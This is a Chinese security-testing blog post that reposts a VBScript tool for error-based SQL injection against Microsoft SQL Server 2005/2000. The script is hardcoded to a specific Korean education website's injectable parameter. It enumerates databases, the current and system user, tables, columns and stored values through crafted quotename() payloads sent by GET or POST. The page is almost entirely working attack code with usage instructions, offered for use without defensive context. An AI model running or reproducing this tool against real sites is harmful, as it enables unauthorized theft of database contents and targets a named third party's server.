WoYiGui's BloG | 关注安全测试

<br />&#039;***********************************************************************************************<br />&#039;Sql2005注射辅助脚本&#91;粗糙版&#93; 用于mssql显错模式 By Tr4c3&#91;at&#93;126&#91;Dot&#93;com <br />&#039;亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。 <br />&#039;***********************************************************************************************<br />&#039;为了保持脚本的通用性，放弃了 and (select col_name(object_id(&#039;TableName&#039;),N))=0这样的用法。<br />&#039;欲返回韩文等字符可修改121或者136行，更多的设置要自己修改<br />&#039;更多功能请大家自己加入<br /><br />Const method = "Get" &#039;提交方式请修改此处,有get和post可选<br />Const DisPlay = "D" &#039;S 保存到文件，D输出到屏幕<br /><br />Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD<br /><br />strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120&#039;" &#039;基于注射点的不确定性，此处请手工更改<br />i = 1 &#039;库的基数<br />k = 0 &#039;表和字段的基数<br />MyArray = Split(strUrl_B, "?", -1, 1)<br />strUrl = MyArray(0) &#039;取url<br />strArg = MyArray(1) &#039;取参数<br />Set Args = Wscript.Arguments<br /><br />If Args.Count = 0 Then<br /> ShowU<br />End If<br />&#039;If Args.Count =1 And LCase(Args(0))<br /><br />&#039;************************************************************************<br />&#039; 爆库 <br />&#039;************************************************************************<br />If Args.Count =1 Then<br /> If LCase(Trim(Args(0)))="databases" Then<br /> ResuT("---------------===============================--------------")<br /> ResuT("All The DataBases:")<br /><br /> Do<br /> strData = " and quotename(db_name("&i&"))=0--"<br /> sqlInj(strData)<br /> i = i + 1<br /> Loop Until StrD=""<br /> ResuT("---------------===============================--------------")<br /> Wscript.Quit<br /> ElseIf LCase(Trim(Args(0)))= "info" then<br /> ResuT("---------------===============================--------------")<br /> ResuT("The Current Database is:")<br /> strData = " and quotename(db_name())=0--"<br /> sqlInj(strData)<br /> ResuT("---------------===============================--------------")<br /> ResuT("The database User is:")<br /> strData = " and quotename(user)=0--"<br /> sqlInj(strData)<br /> ResuT("---------------===============================--------------")<br /> ResuT("The System_user is:")<br /> strData = " and quotename(System_user)=0--"<br /> sqlInj(strData)<br /> ResuT("---------------===============================--------------")<br /> Wscript.Quit<br /> End If<br />End If<br />&#039;************************************************************************<br />&#039; 爆表 <br />&#039;************************************************************************<br />If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then<br /> ResuT("---------------===============================--------------")<br /> ResuT("The Tables Of " & Args(0))<br /> Do<br /> strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"<br /> sqlInj(strData)<br /> k = k + 1<br /> Loop Until StrD=""<br /> ResuT("---------------===============================--------------")<br /> Wscript.Quit<br />End If<br /><br />&#039;************************************************************************<br />&#039; 爆字段 <br />&#039;************************************************************************<br />If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then<br /> Database = Args(0)<br /> Table = Args(1)<br /> TarGet = DataBase & ".dbo." & Table<br /> TarGetCol = Database & ".DBO.SYSCOLUMNS"<br /> ResuT("---------------===============================--------------")<br /> ResuT("The Columns Of " & TarGet)<br /> Do<br /> strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id(&#039;"& TarGet &"&#039;) and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id(&#039;"& TarGet &"&#039;)))=0--"<br /> sqlInj(strData)<br /> k = k + 1<br /> Loop Until StrD=""<br /> ResuT("---------------===============================--------------")<br /> Wscript.Quit<br />End If<br /><br />&#039;************************************************************************<br />&#039; 爆字段值 <br />&#039;************************************************************************<br />If Args.Count=4 And LCase(Trim(Args(3)))="values" Then<br /> Database = Args(0)<br /> Table = Args(1)<br /> col = Args(2)<br /> Target = Database & ".dbo." & Table <br /> ResuT("---------------===============================--------------")<br /> ResuT("The Values Of " & Args(2) & " in "&Target)<br /> Do<br /> strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"<br /> sqlInj(strData)<br /> k = k + 1<br /> Loop Until StrD=""<br /> ResuT("---------------===============================--------------")<br /> Wscript.Quit<br />End If<br /><br />Sub SqlInj(value)<br /> If UCase(method) = "GET" Then<br /> value = strArg & value<br /> Set objXML = CreateObject("Microsoft.XMLHTTP")<br /> objXML.Open "GET", strUrl &"?" & value , False<br /> objXML.SetRequestHeader "Referer", strUrl<br /> &#039;objXML.SetRequestHeader "Accept-Language", "EUC-KR"<br /> objXML.send()<br /> strRevS = objXML.ResponseText &#039;默认用这个<br /> &#039;strRevS = bytes2BSTR(objXML.ResponseBody) &#039;韩文有时候要用这个<br /> If InStr(strRevS,"&#039;&#91;")<>0 And InStr(strRevs,"&#93;&#039;")<>0 Then<br /> strD = Mid(strRevS,InStr(strRevS,"&#039;&#91;")+2, InStr(strRevs,"&#93;&#039;") - Instr(strRevS,"&#039;&#91;")-2)<br /> ResuT(" &#124;_"&strD)<br /> Else<br /> strD = ""<br /> End If<br /> ElseIf UCase(method) = "POST" Then<br /> value = strArg & value<br /> Set objXML = CreateObject("Microsoft.XMLHTTP")<br /> objXML.Open "POST", strUrl, False<br /> objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"<br /> objXML.SetRequestHeader "Referer", strUrl<br /> objXML.send(UrlEncode(value))<br /> strRevS = objXML.ResponseText &#039;默认用这个<br /> &#039;strRevS = bytes2BSTR(objXML.ResponseBody) &#039;韩文有时候要用这个<br /> If InStr(strRevS,"&#039;&#91;")<>0 And InStr(strRevs,"&#93;&#039;")<>0 Then<br /> strD = Mid(strRevS,InStr(strRevS,"&#039;&#91;")+2, InStr(strRevs,"&#93;&#039;") - Instr(strRevS,"&#039;&#91;")-2)<br /> ResuT(" &#124;_"&strD)<br /> Else<br /> strD = ""<br /> End If<br /> End If<br />End Sub<br /><br />Function ResuT(strInfo)<br /> If UCase(DisPlay) = "S" Then<br /> Set fso = CreateObject("Scripting.FileSystemObject")<br /> Set fso1 = fso.OpenTextFile("result.txt",8,True)<br /> fso1.WriteLine(strInfo)<br /> fso1.Close<br /> Set fso = Nothing<br /> ElseIf UCase(DisPlay) = "D" Then<br /> Wscript.Echo(strInfo)<br /> End If<br />End Function<br /><br />Function UrlEncode(str)<br /> str = Replace(str," ","+")<br /> UrlEncode = str<br />End Function<br /><br />Function bytes2BSTR(vIn)<br /> strReturn = ""<br /> For i = 1 To LenB(vIn)<br /> ThisCharCode = AscB(MidB(vIn,i,1))<br /> If ThisCharCode < &H80 Then<br /> strReturn = strReturn & Chr(ThisCharCode)<br /> Else<br /> NextCharCode = AscB(MidB(vIn,i+1,1))<br /> strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))<br /> i = i + 1<br /> End If<br /> Next<br /> bytes2BSTR = strReturn<br />End Function<br /><br />Sub showU()<br /> With Wscript<br /> .Echo("+--------------------------=====================------------------------------+")<br /> .Echo("Sql2005注射辅助脚本（粗糙版），用于mssql显错模式 By Tr4c3&#91;at&#93;126&#91;Dot&#93;com")<br /> .Echo("Usage:")<br /> .Echo(" cscript"&.ScriptName&" info--爆基本信息")<br /> .Echo(" cscript"&.ScriptName&" databases--爆所有库名")<br /> .Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名")<br /> .Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")<br /> .Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")<br /> .Echo("+--------------------------=====================------------------------------+")<br /> .Quit<br /> End with<br />End Sub<br /><br />